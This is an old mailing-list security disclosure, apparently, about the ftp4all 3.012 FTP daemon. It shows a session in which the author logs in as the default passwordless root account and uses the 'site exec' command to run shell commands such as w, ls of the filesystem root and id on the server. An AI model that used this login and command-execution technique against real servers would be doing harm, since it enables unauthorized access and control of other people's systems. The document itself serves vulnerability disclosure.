Retarded *feature* in ftp4all

[KF <dotslash () snosoft com>]

Here is some info on a feature of ftp4all that could lead to a security 
issue.


Heres the latest versvion of ftp4all that I can find... version 3.012
This program is OLD and looks unmaintained its also got overflows so 
I wouldnt use it. 
* http://www.ftp4all.de/v3/CHANGES
VERSION HISTORY ===== Version 3.012 (04 ... Bugfix: Possible buffer overflow
in user ... for that (printf formattable). | `= Version ...
http://www.ftp4all.de/v3/CHANGES
More Results From: www.ftp4all.de

Q: What is FTP4ALL ?
A: FTP4ALL is a ftp daemon for unix systems. It runs under any normal user account and doesn't
require any special rights to start. It has its own permission and user handling, and is mainly
independent from the operating system it runs under (although it inherits any limitations of the
user account under whcih it is running).

Q: Why should I use FTP4ALL, if there is <any ftp daemon> ?
A: First, every other ftp daemon I know needs special privileges to run it. Then, there are
system-integrated daemons which are used to access your shell accounts with the FTP protocol.
FTP4ALL is different: you can generally run FTP4ALL from any account, without root access, with no
power hit as compared with other advanced ftpdaemons.

Heres is a nice *feature* I have found in ftp4all. 

EXEC *
Syntax : exec <command> [<arguments>]
Example: exec ls -al
This executes a command on the server. The result is sent back over the control connection, i.e.
you get a sequence of 200- lines. When the command finishes, the exit code is displayed. You can
not run interactive commands such as a shell.

example usage of *feature*
sh-2.05$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.05$ /home/ftp/my_site/sbin/ftpd
FTP4ALL 3.012, Copyright (C) 1996-2000 by Crescent (crescent () ftp4all de)
This program is FREE SOFTWARE and distributed under GNU PUBLIC LICENSE
Server on host linuxppc.insight.rr.com is ready and listening on *:2000
Base directory : /home/ftp/my_site
Readme file    : (none)
Permission file: .permissions
Errlog file    : log/ftpd.err
Log file       : log/ftpd.log
Log program    : (none)
Server program : /home/ftp/my_site/sbin/ftps

Joe Schmoe uses my server and knows default user is root with no pass
sh-2.05$ ftp kf.ftp4all.boxen  2000
Connected to kf.ftp4all.boxen
220 FTP4ALL Server 3.012 (05/Mar/2000) ready.
Name (localhost:nobody): root
331 Password required for root.
Password: <default no passwd>
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

Lets use the built in w command to see whos logged in to ftpd
ftp> site w
211- NR HANDLE    GROUP     ON-TM AC-TM MUP/MDN ACTIVITY / (LAST ACTIVITY)
211- 01·root      0         00:01 00:00   0/  0 (LOGIN)
211  FTP4ALL v3.012         HH:MM MM:SS ON-TM=ONLINE TIME / AC-TM=ACTIVITY TIME

Lets try it another way ... this looks like w output from a shell. 
ftp> site exec w
200-  6:16pm  up 14:32,  2 users,  load average: 0.00, 0.02, 0.04
200-USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
200-root     tty1     -                 3:47am 14:28m  3.22s  0.07s  xinit /etc/X11/
200-root     pts/0    -                 3:48am 14:28m  0.03s  0.03s  /bin/cat
200 EXEC finished with exitcode 0.

Lets check to make sure.
ftp> ls ../../../../
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Directory listing completed.
 nothing here

yes this is definately output from a shell
ftp> site exec ls ../../../../
200-bin
200-boot
200-dev
200-etc
200-home
200-lib
200-lost+found
200-mnt
200-opt
200-proc
200-root
200-sbin
200-tmp
200-usr
200-var
200 EXEC finished with exitcode 0.
ftp>

so obviously you run commands as whoever this program was run as. The company suggests a non priv
user like nobody. But if you are dumb you may have ran this as root. Have fun. 
ftp> site exec id
200-uid=99(nobody) gid=99(nobody) groups=99(nobody)
200 EXEC finished with exitcode 0.

-KF